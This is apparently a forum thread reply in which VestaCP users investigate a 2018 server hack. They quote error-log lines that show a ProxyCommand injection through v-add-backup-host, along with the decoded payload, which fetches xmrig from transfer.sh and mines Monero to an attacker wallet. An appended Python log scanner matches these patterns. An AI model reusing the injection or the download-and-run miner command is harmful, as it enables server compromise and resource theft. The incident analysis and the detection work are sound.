
Re: have been HACKED ! by xaxaxa.eu

Posted: Sun Jul 22, 2018 3:47 pm
by dkyadav008
cybersa wrote:
Mon Jul 02, 2018 10:26 am
My website was hacked on Jun 22 around 11:10 PM UTC. My server got upgraded to the latest version automatically, but I think the server was infected before that.

I have removed the miner file under /tmp/xmrig. Then I analyzed the server log to find the root cause and found the following things:

1. No new user (sysroot) has been created as mentioned in the first post's script.
2. No new cron jobs have been added.
3. xmrig was run with this cmd:

Code:

./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
4. Found this log in /var/log/vesta/error.log

Code:

2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
Decode Version:

Code:

cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
My OS: Ubuntu 16

FYI
@ScIT

No new user, but I also found errors in /var/log/vesta/error.log; the logs show it ran once after upgrading to version 22 as well.

Code:

2018-07-12 22:48:01 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

Code:

2018-07-13 07:39:36 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]

Code:

2018-07-22 17:02:00 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo 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|base64 -d|sh" x' '******' [Error 15]
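As an added example (not from this thread or from VestaCP), a small Python scanner for the pattern both posters found in /var/log/vesta/error.log: a v-add-backup-host entry whose host argument carries an injected -oProxyCommand with a base64-decode-and-execute pipeline. The log lines and the base64 placeholder below are constructed; the scanner checks every command's arguments, not only v-add-backup-host, so it also catches the same injection in other vesta commands.

```python
import re
from datetime import datetime

# Constructed sample of /var/log/vesta/error.log lines (not from a real server).
# PLACEHOLDER_B64 stands in for the encoded payload; it is not a real command.
SAMPLE_LOG = """\
2018-06-22 23:10:01 v-list-user  'admin' [Error 3]
2018-06-22 23:13:28 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo PLACEHOLDER_B64|base64 -d|sh" x' '******' [Error 15]
2018-07-12 22:48:01 v-add-backup-host  'sftp' 'backup.example' 'backupuser' '******' [Error 15]
2018-07-22 17:02:00 v-add-backup-host  'sftp' 'xx' '"-oProxyCommand=echo PLACEHOLDER_B64|base64 -d|sh" x' '******' [Error 15]
"""

# vesta error.log format: "<date> <time> <v-command>  <quoted args> [Error N]"
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (v-\S+)\s+(.*)$")

# Indicators from the thread: an SSH option smuggled into a host/user field,
# and a decode-and-run pipeline that should never appear in a hostname.
SUSPICIOUS = [
    re.compile(r"-o\s*ProxyCommand\s*=", re.IGNORECASE),
    re.compile(r"base64\s+-d\s*\|\s*(ba)?sh\b"),
]


def scan_vesta_log(text):
    """Return (timestamp, command, indicator) for each suspicious log entry."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a vesta command entry
        ts, cmd, args = m.groups()
        for pat in SUSPICIOUS:
            if pat.search(args):
                hits.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), cmd, pat.pattern))
                break  # one report per line is enough
    return hits


if __name__ == "__main__":
    for ts, cmd, why in scan_vesta_log(SAMPLE_LOG):
        print(f"{ts} {cmd}: suspicious argument matched /{why}/")
```

Run it against the real file with `scan_vesta_log(open("/var/log/vesta/error.log").read())`; a hit is a reason to look for a miner under /tmp and for the process cmdline shown above, not proof of compromise by itself.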